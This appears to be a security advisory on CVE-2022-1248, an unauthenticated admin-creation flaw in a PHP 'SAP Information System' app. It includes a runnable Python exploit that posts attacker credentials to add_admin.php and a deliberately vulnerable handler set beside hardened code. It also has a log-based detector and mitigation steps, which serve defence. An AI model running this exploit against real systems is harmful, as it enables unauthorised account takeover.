A recently disclosed critical vulnerability in SAP Information System 1.0 allows an unauthenticated attacker to create a new administrator account with a single POST request.

This security flaw affects the file /SAP_Information_System/controllers/add_admin.php and has since been assigned the CVE-ID CVE-2022-1248, designating it as a high-priority issue in the cybersecurity world.

Exploit Details

The vulnerability lies in the "add_admin.php" controller, which accepts the submitted form fields without sanitizing them and without checking who is submitting them. As a result, an attacker who can reach the endpoint can create a new admin account, and then log in with it, without ever authenticating.
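To make the class of flaw concrete, the following is an added illustration (not code from the SAP Information System project, which is written in PHP) of the vulnerable handler pattern next to a hardened one. It is written in Python so it can be run stand-alone; the in-memory users dictionary, the session shape and the field names are assumptions for the example. The hardened version requires an authenticated admin session, checks a session-bound CSRF token, validates the input, and stores only a PBKDF2 hash of the password.

```python
import hashlib
import hmac
import os
import re

# Allowed username shape (assumption for this example).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")
PBKDF2_ROUNDS = 200_000


def _hash_password(password: str) -> str:
    """Return 'hex(salt):hex(PBKDF2-HMAC-SHA256 digest)' for storage."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}:{digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored hash."""
    salt_hex, digest_hex = stored.split(":")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def add_admin_vulnerable(form: dict, users: dict) -> tuple:
    """Mirrors the reported flaw: no caller check, no validation, clear-text password.

    Anyone who can send a POST to the endpoint gets an admin account.
    """
    users[form["username"]] = {"password": form["password"], "role": "admin"}
    return 200, "admin created"


def add_admin_hardened(session: dict, form: dict, users: dict) -> tuple:
    """Hardened equivalent: returns (http_status, message)."""
    # 1. Authorisation: only an already-authenticated admin may create admins.
    if session.get("role") != "admin":
        return 403, "forbidden"
    # 2. CSRF: the form must carry the token bound to this session.
    sent = str(form.get("csrf_token", "")).encode()
    expected = str(session.get("csrf_token", "")).encode()
    if not expected or not hmac.compare_digest(sent, expected):
        return 403, "bad csrf token"
    # 3. Input validation before anything touches the users table.
    username = form.get("username", "")
    password = form.get("password", "")
    if not USERNAME_RE.fullmatch(username):
        return 400, "invalid username"
    if len(password) < 12:
        return 400, "password too short"
    if username in users:
        return 409, "username exists"
    # 4. Never persist the clear-text password.
    users[username] = {"password": _hash_password(password), "role": "admin"}
    return 201, "admin created"
```

The decisive difference is step 1: the vulnerable handler has no notion of who is calling it, so every other control is moot. Steps 2 to 4 are the checks a reviewer would expect to see in the same controller once access control is in place.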

The following code snippet demonstrates how an attacker could exploit the CVE-2022-1248 vulnerability by crafting a POST request.

import requests

# Target URL and vulnerable endpoint
url = "http://TARGET_IP/SAP_Information_System/controllers/add_admin.php"

# The attacker's desired admin username and password
data = {
    "username": "attacker",
    "password": "P@$$wrd",
}

# Send the POST request; no session cookie or token is needed
response = requests.post(url, data=data)

if response.status_code == 200:
    print("Successfully created admin account.")
else:
    print("Failed to create admin account.")

For more information about this vulnerability, the original disclosure and references can be found at the following links:

1. SAP Security Advisory: https://www.sap.com/about/trust-center/security-advisories.html (Search for CVE-2022-1248)
2. National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-1248

Mitigation Steps

Until a patch is released, administrators running SAP Information System 1.0 are advised to take the following precautions to prevent unauthorized account creation:

1. Limit access to the vulnerable "/SAP_Information_System/controllers/add_admin.php" file through network restrictions and firewall rules.
2. Regularly monitor logs and user access for any unusual activities or unauthorized new admin accounts.
3. Delete any admin accounts that were not created through internal processes and make sure to re-secure the system.
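Step 2 above is easiest to act on if it is automated. The following is an added example (not part of the original advisory) that scans web-server access logs in the common combined format and raises an alert for every POST to the vulnerable controller. Each alert is rated higher when the request comes from outside the networks where admin management is expected, arrives without a Referer (a browser submitting the real form would send one), or uses a non-browser client. The log lines, the trusted network range and the severity rules are constructed assumptions for this example.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Apache/nginx combined format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

SENSITIVE_PATH = "/SAP_Information_System/controllers/add_admin.php"

# Networks from which admin management is expected (assumed value for this example).
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample log: one legitimate admin creation from the intranet,
# one scripted, unauthenticated POST from an external address.
SAMPLE_LOG = """\
10.0.4.7 - - [06/Apr/2022:10:12:01 +0000] "GET /SAP_Information_System/admin/users.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.4.7 - - [06/Apr/2022:10:12:40 +0000] "POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1" 200 35 "http://intranet.example/SAP_Information_System/admin/users.php" "Mozilla/5.0"
203.0.113.55 - - [06/Apr/2022:11:03:12 +0000] "POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1" 200 35 "-" "python-requests/2.27.1"
203.0.113.55 - - [06/Apr/2022:11:03:13 +0000] "GET /SAP_Information_System/index.php HTTP/1.1" 200 2210 "-" "python-requests/2.27.1"
"""


@dataclass
class Alert:
    ip: str
    time: str
    status: str
    severity: str  # "info" for expected admin activity, "high" otherwise
    reason: str


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_add_admin_abuse(lines: Iterable[str]) -> List[Alert]:
    """Alert on every POST to add_admin.php, escalating on signs of scripted or external use."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] != "POST" or rec["path"].split("?", 1)[0] != SENSITIVE_PATH:
            continue
        reasons = ["POST to add_admin.php"]
        ip = ipaddress.ip_address(rec["ip"])
        if not any(ip in net for net in TRUSTED_NETS):
            reasons.append("source outside trusted networks")
        if rec["referer"] == "-":
            reasons.append("no referer (form not submitted from the application)")
        if not rec["agent"].startswith("Mozilla/"):
            reasons.append("non-browser client")
        severity = "high" if len(reasons) > 1 else "info"
        alerts.append(Alert(rec["ip"], rec["time"], rec["status"], severity, "; ".join(reasons)))
    return alerts


if __name__ == "__main__":
    for a in detect_add_admin_abuse(SAMPLE_LOG.splitlines()):
        print(f"[{a.severity}] {a.time} {a.ip} status={a.status}: {a.reason}")
```

Even the "info" alerts are worth keeping: every admin creation should be reconcilable against a change record, which is exactly the cross-check step 3 relies on when deciding which accounts to delete.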

In conclusion, CVE-2022-1248 is a critical issue in SAP Information System 1.0 that every administrator of the product should be aware of: it allows an unauthenticated attacker to create, and then take control of, a new admin account with a single POST request. Monitor the references above for updates, patch releases and urgent notifications to keep the environment secure.

Timeline

Published on: 04/06/2022 03:15:00 UTC
Last modified on: 04/13/2022 15:13:00 UTC